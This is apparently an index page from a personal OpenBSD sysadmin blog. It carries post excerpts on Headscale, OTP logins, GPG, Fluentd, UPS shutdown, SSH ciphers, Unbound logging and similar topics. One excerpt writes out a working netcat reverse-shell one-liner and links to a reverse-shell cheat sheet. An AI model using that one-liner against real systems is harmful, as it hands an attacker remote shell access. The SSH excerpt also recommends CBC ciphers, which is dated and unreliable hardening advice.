Headscale - Real World Example

Tailscale on Public Internet Setup Let’s build a few machines around the world and get our hands dirty with headscale / tailscale. headscale amsterdam tailscale stockholm miami singapore sydney the goal is to build a full-mesh network with all 4 tailscale clients Headscale Server install OpenBSD 7.2 (needs golang 1.19) as described here Generate Install Key let’s generate a reusable install key for all 4 clients. It’s valid for 1 hour.

Headscale - OpenBSD

Running Headscale Server on OpenBSD i like and widely use wireguard for my infrastructure. i’m also aware of its limitations and i know the tailscale project but never gave it a try. recently, i stumbled upon the headscale project, an open-source alternative to the (closed) tailscale server. perfect, let’s give it a try! and, of course, i’m going to implement this with OpenBSD, what else ;) Docs https://github.com/juanfont/headscale/blob/main/docs/running-headscale-openbsd.md https://zakaria.org/posts/headscale-setup.md on the Server compile and install server this is working on OpenBSD 7.

OpenBSD & OTP

i don’t like ssh & password authentication. but sometimes, especially during setup or recovery, it’s needed and makes sense. so i thought i’d protect some boxes with otp. here are a few notes and instructions Build login_otp git clone https://github.com/reyk/login_otp cd login_otp make obj make all doas make install Initialize OTP DB doas otp -i Generate Key for User otp -g Name: stoege Key: xxxx xxxx xxxx xxxx xxxx xxxx xx URL: otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30 Build QR Code echo "otpauth://totp/stoege?

Url Shortener for CLI

CLI URL Shortener wrote a little URL Shortener in Python with FastAPI and a wrapper script for CLI usage. needs the httpie & jq packages. the python backend is under development, the CLI wrappers for different OSes are right here … Usage somehost$ ./myurlshort usage: /usr/local/bin/myurlshort http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to anyhost$ ./myurlshort http://my-url-to-short.egal.world.planet.universe https://url.stoege.net/xXxXx CLI Wrappers OpenBSD cat << 'EOF' > myurlshort #!/usr/bin/env bash # url shortener for openbsd, v1.0, 2022-09-12, by @stoege which jq >/dev/null || ( echo -e "*** jq not installed ***\ndoas pkg_add jq\n"; ) which https >/dev/null || ( echo -e "*** httpie not installed ***\ndoas pkg_add httpie\n"; ) if [[ $# -ne 1 ]]; then echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.

macOS

some adaptions for macOS Shell macOS has been using zsh for a while. If you wanna switch back to bash, here are some Notes … Switch to Bash chsh -s /bin/bash install brew the famous package manager for macOS /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" install keychain if you work with ssh agent, you may wanna try keychain … brew install keychain build .bash_profile this will overwrite your existing .bash_profile, so back it up first cp ~/.bash_profile ~/.bash_profile.$(date "+%s")~ cat << 'EOF' > ~/.

GPG & Gopass & Gitlab

GPG and how to use it Create a Key with ECC gpg --expert --full-generate-key (9) ECC and ECC (1) Curve 25519 0 = key does not expire (or whatever you prefer!) Real name: Max Muster Email address: max@muster.net Comment: - pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid Max Muster (-) <max@muster.net> sub cv25519 2022-09-04 [E] Public Key max@host $ gpg /home/max/.gnupg/pubring.kbx ---------------------------- pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid [ultimate] Max Muster (-) <max@muster.

OpenBSD - ReverseShell

Reverse Shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/ Test it Listen on Host A Set Listener on Host A (192.168.1.100) hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;) sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

PuffyPages

some cool pages about OpenBSD https://www.openbsd.org https://man.openbsd.org https://www.openbsdfoundation.org https://marc.info https://undeadly.org/cgi?action=front https://bsdly.blogspot.com/ https://obsd.solutions/en/blog/ https://dataswamp.org/~solene/ https://blog.apnic.net/2021/10/28/openbsd-part-1-how-it-all-started/ + https://blog.apnic.net/2021/11/05/openbsd-part-2-why-use-openbsd/ https://vincentdelft.be/category/openbsd http://ratfactor.com/openbsd/2022-08-02-install https://blog.lambda.cx/tags/openbsd/ https://www.openbsdjumpstart.org/#/ https://blog.lambda.cx/posts/openbsd-introduction-talk/openbsd-introduction.pdf https://why-openbsd.rocks/fact/ https://openbsdrouterguide.net/ sha256: a86099a13463c50993ce9fa2d75543daf1888454259f04daab6240c8a6dec7e9

DNSSEC - OARC Size Tester

Talk from @mwl at BSDCAN 2022 https://www.youtube.com/watch?v=1n62VZj-CKI OARC Reply Size Tester dig +short rs.dns-oarc.net TXT Host1 - good :) # dig +short rs.dns-oarc.net TXT rst.x4090.rs.dns-oarc.net. rst.x4058.x4090.rs.dns-oarc.net. rst.x4064.x4058.x4090.rs.dns-oarc.net. "45.15.80.80 DNS reply size limit is at least 4090" "45.15.80.80 sent EDNS buffer size 4096" Host2 - bad :( # dig +short rs.dns-oarc.net TXT rst.x1196.rs.dns-oarc.net. rst.x1206.x1196.rs.dns-oarc.net. rst.x1204.x1206.x1196.rs.dns-oarc.net. "74.63.25.240 DNS reply size limit is at least 1206" "74.63.25.240 sent EDNS buffer size 1232" sha256: 110b220f93eff767b7e4d488294b00ede4f4509258d0148704b145df79fa9821

Fluent - Data Collector

Fluentd is an open-source data collector for a unified logging layer. Fluentd allows you to unify data collection and consumption for better use and understanding of data. Docs https://docs.fluentd.org/ http://fluentular.herokuapp.com/ Install Ruby pkg_add ruby-3.1.2 Set Symlinks ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler ln -sf /usr/local/bin/erb31 /usr/local/bin/erb ln -sf /usr/local/bin/gem31 /usr/local/bin/gem ln -sf /usr/local/bin/irb31 /usr/local/bin/irb ln -sf /usr/local/bin/racc31 /usr/local/bin/racc ln -sf /usr/local/bin/rake31 /usr/local/bin/rake ln -sf /usr/local/bin/rbs31 /usr/local/bin/rbs ln -sf /usr/local/bin/rdbg31 /usr/local/bin/rdbg ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc ln -sf /usr/local/bin/ri31 /usr/local/bin/ri ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof Install Fluentd gem install fluentd more Symlinks ln -sf /usr/local/bin/fluentd31 /usr/local/bin/fluentd Create Config fluentd --setup /etc/fluent Edit config cat << 'EOF' > /etc/fluent/fluent.

Sensorsd - UPS Shutdown

Shutdown Hosts on Power Outages Everybody is talking about power outages. Let’s assume you have a Smart-UPS for your playground and you’d like to shut down some infrastructure to avoid trouble with corrupt filesystems, broken VMs and things like that. Connect the UPS to the APU via USB cable dmesg shows the UPS connected APU# dmesg uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ... uhidev0: iclass 3/0, 142 report ids upd0 at uhidev0 uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1 uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1 .

SSH - Cipher, Key, MAC

SSH Stuff Supported Ciphers, Keys and MACs on OpenBSD 7.1. Not all of them are good for usage, here is my recommendation. Recommended for your sshd_config / ssh_config (each option and its comma-separated list belong on one line, without spaces) Ciphers aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes128-cbc HostKeyAlgorithms ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-256 KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256 MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com PubkeyAcceptedKeyTypes ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-25 List of all available Types Cipher ssh -Q cipher 3des-cbc aes128-cbc aes192-cbc aes256-cbc aes128-ctr aes192-ctr aes256-ctr aes128-gcm@openssh.com aes256-gcm@openssh.com chacha20-poly1305@openssh.com HostbasedAcceptedAlgorithms ssh -Q HostbasedAcceptedAlgorithms ssh-ed25519 ssh-ed25519-cert-v01@openssh.com sk-ssh-ed25519@openssh.com sk-ssh-ed25519-cert-v01@openssh.com ssh-rsa rsa-sha2-256 rsa-sha2-512 ssh-dss ecdsa-sha2-nistp256 ecdsa-sha2-nistp384 ecdsa-sha2-nistp521 sk-ecdsa-sha2-nistp256@openssh.

OpenBSD - Full Disk Encryption

Intro I never used the full-disk encryption feature as there was no need for it. It doesn’t make sense for hosted VMs, as you have to enter the passphrase at every boot on the console. So it’s a pain, and the passphrase can still be intercepted on the hoster’s infrastructure. Disk encryption does not make sense at home either, as all my devices remain at home (and hopefully never get stolen). It would make sense on a notebook, but i’m more the Apple fanboy when it comes to portable machines.

JC - JSON from CLI

how to build json from the cli we all like json, don’t we? https://kellyjonbrazil.github.io/jc/docs/parsers/ping add package doas pkg_add jc try it with ping openbsd-box # ping -c 3 1.1.1.1 |jc --ping -p 2>/dev/null { "destination_ip": "1.1.1.1", "data_bytes": 56, "pattern": null, "destination": "1.1.1.1", "packets_transmitted": 3, "packets_received": 3, "packet_loss_percent": 0.0, "duplicates": 0, "round_trip_ms_min": 9.219, "round_trip_ms_avg": 9.826, "round_trip_ms_max": 10.158, "round_trip_ms_stddev": 0.43, "responses": [ { "type": "reply", "bytes": 64, "response_ip": "1.1.1.1", "icmp_seq": 0, "ttl": 59, "time_ms": 10.

Unbound - Logging

Enable Logging for Unbound update unbound.conf /var/unbound/etc/unbound.conf server: logfile: /log/unbound.log verbosity: 1 log-queries: yes ... (unbound runs chrooted in /var/unbound, so /log/unbound.log inside the chroot is /var/unbound/log/unbound.log on the host) create folder/logfile log=/var/unbound/log/unbound.log doas mkdir /var/unbound/log/ doas touch $log doas chmod 660 $log doas chown _unbound:_unbound $log restart service doas rcctl restart unbound tail logfile tail -f /var/unbound/log/unbound.log # tail -f /var/unbound/log/unbound.log [1660208341] unbound[3279:0] notice: init module 0: validator [1660208341] unbound[3279:0] notice: init module 1: iterator [1660208341] unbound[3279:0] info: start of service (unbound 1.15.0). [1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.